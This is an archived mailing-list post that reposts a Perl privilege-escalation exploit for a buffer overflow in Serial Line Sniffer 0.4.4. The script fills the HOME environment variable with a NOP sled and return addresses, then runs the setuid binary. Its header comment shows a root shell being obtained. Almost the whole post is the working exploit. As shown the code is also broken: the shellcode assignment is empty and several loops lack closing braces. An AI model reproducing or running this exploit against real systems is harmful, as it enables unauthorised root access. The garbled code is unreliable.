[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Serial Line Sniffer 0.4.4 Buffer Overflow

Original can be found at http://shellcoders.com/sintigan/slsnif-ploit.pl

# Author: Sintigan@xxxxxxxxxxxxxxx
# http://www.shellcoders.com/
# ----------------------------------------
# Program ID: Serial Line Sniffer 0.4.4
# sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl
# sh-3.00# id
# uid=0(root) gid=100(users) groups=100(users)
# ---------------------------------------
# Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk
# and whoever else i forgot

 $shellcode = 

 $buf = 288;
 $ret = 0xbffff3a0;
 $nop = "\x90";
 $offset = -250;         

 if (@ARGV == 1) { $offset = $ARGV[0]; }

 for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) {
  $buffer .= $nop;

 $buffer .= $shellcode;
 $addr = pack('l', ($ret + $offset));
 for ($i += length($shellcode); $i < $buf; $i += 4) {
  $buffer .= $addr;
 $ENV{'HOME'} = $buffer; exec("/usr/local/bin/slsnif");